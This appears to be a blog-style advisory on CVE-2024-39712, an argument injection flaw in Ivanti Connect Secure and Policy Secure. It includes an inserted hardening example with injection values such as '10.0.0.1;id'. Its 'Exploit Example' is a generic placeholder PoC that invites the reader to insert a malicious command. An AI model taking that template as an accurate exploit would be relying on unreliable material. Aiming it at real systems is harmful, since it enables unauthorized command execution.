A critical security vulnerability has been unearthed in certain versions of Ivanti Connect Secure and Ivanti Policy Secure software products. Classified as CVE-2024-39712, this vulnerability relates specifically to argument injection. Exploiting this weakness enables remote authenticated attackers, who possess administrative privileges, to carry out remote code execution on any vulnerable system. In the sections below, we will expand on the details of this vulnerability, demonstrate an exploit using a code snippet, and provide links to essential resources and references.

Affected Versions

All versions prior to 22.7R1.1

To ensure the safety of your system, it is critical to upgrade any of the above-mentioned software products to the latest version.

Vulnerability Details

This particular argument injection flaw occurs when an authenticated admin user reaches the vulnerable function through an external input. The software concatenates that input into a command-line argument without validating or escaping it, so attacker-controlled characters are interpreted as additional arguments or commands, which results in unintended command execution. This may lead to various security risks, including unauthorized access to sensitive data or unauthorized actions carried out on the targeted system.

Potential attackers would require admin access to exploit this vulnerability, which limits the attack surface. However, organizations using the affected software should still treat this as a major threat.
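To illustrate the bug class described above, here is an added example that is not Ivanti's code and does not reproduce the actual CVE-2024-39712 code path: a constructed admin-only handler that passes one caller-supplied value to a tool, shown in the concatenating form, in an argv-only form that is still open to argument injection, and in a hardened form. The `ping` command and the hostname argument are assumed stand-ins, and nothing is executed; the shell-parsing effect is measured with `shlex`.

```python
import re
import shlex

# Constructed stand-in for an admin-only diagnostic handler (not Ivanti's code):
# the handler takes one caller-supplied value and runs a tool with it.
SAFE_HOST = re.compile(r"[A-Za-z0-9.-]{1,253}")


def build_unsafe_shell(host: str) -> str:
    """Vulnerable pattern: the input is concatenated into a shell command line.
    A ';' or '&&' inside the value starts a second command once this string
    reaches a shell (e.g. subprocess.run(..., shell=True))."""
    return "ping -c 1 " + host


def build_argv_only(host: str) -> list:
    """Safer, but still open to argument injection: no shell parses the
    value, yet a value beginning with '-' is read by the tool as an option."""
    return ["ping", "-c", "1", host]


def build_hardened(host: str) -> list:
    """Allow-list the value, refuse option-looking values, and place it after
    '--' so the tool can never treat it as a flag. Keep the argv form."""
    if not SAFE_HOST.fullmatch(host) or host.startswith("-"):
        raise ValueError(f"rejected argument: {host!r}")
    return ["ping", "-c", "1", "--", host]


def command_count(cmdline: str) -> int:
    """Number of commands a POSIX shell would run for this line: tokenise with
    shell punctuation and count separators. Shows the unsafe builder's effect
    without executing anything."""
    lex = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    return 1 + sum(1 for tok in lex if tok in (";", "&&", "||", "|"))


def injects_option(argv: list) -> bool:
    """Check for the argv-only builder: does the caller-supplied last element
    look like an option rather than a value?"""
    return argv[-1].startswith("-")


if __name__ == "__main__":
    for value in ("10.0.0.1", "10.0.0.1;id", "--help"):
        print(value, "->", command_count(build_unsafe_shell(value)), "shell command(s);",
              "option-like in argv:", injects_option(build_argv_only(value)))
        try:
            print("  hardened argv:", build_hardened(value))
        except ValueError as err:
            print("  hardened:", err)
```

Note that the hostname allow-list alone still admits `--help`, which is why the leading-dash check and the `--` separator are both kept.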

Exploit Example

Let's look at the following example of how an attacker might exploit this vulnerability using Python. The following proof of concept (PoC) code demonstrates how an attacker can inject a malicious command as an argument when calling the vulnerable function:

import requests

# Replace the target URL, username, and password (the endpoints below are
# placeholders used by this PoC, not documented product paths)
target_url = "http://example.com"
username = "admin"
password = "secretpassword"

# Authenticate using the provided username and password
auth_data = {"username": username, "password": password}
response = requests.post(f"{target_url}/api/auth", data=auth_data, timeout=10)

# Check if the authentication is successful
if response.status_code == 200:
    auth_token = response.json().get("token")

    # Prepare the malicious payload
    payload = ";YOUR_MALICIOUS_COMMAND"

    # Inject the payload into the vulnerable function as an argument.
    # json= serialises the body as JSON and sets the Content-Type header;
    # passing data= here would have sent a form-encoded body instead.
    headers = {"Authorization": f"Bearer {auth_token}"}
    post_data = {"function": f"vulnerable_function{payload}"}
    response = requests.post(f"{target_url}/api/vulnerable", json=post_data, headers=headers, timeout=10)

    if response.status_code == 200:
        print("Exploit successful")
    else:
        print("Exploit failed")
else:
    print("Authentication failed")

In the code snippet above, replace YOUR_MALICIOUS_COMMAND with your own malicious command or code.

Original References

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39712
2. Ivanti Security Advisory: https://www.ivanti.com/advisory/ivanti-security-advisory-22-005

Mitigation & Prevention

To mitigate the risk of exploitation and protect your organization from this vulnerability, it is highly recommended to update your Ivanti Connect Secure and Ivanti Policy Secure software products to the latest version as soon as possible.

In summary, CVE-2024-39712 remains a high-risk vulnerability for organizations using affected versions of Ivanti Connect Secure and Ivanti Policy Secure software products. It is imperative to take the threat seriously and apply the recommended preventative measures to ensure that your systems remain protected.

Timeline

Published on: 11/13/2024 02:15:19 UTC
Last modified on: 12/01/2024 19:15:04 UTC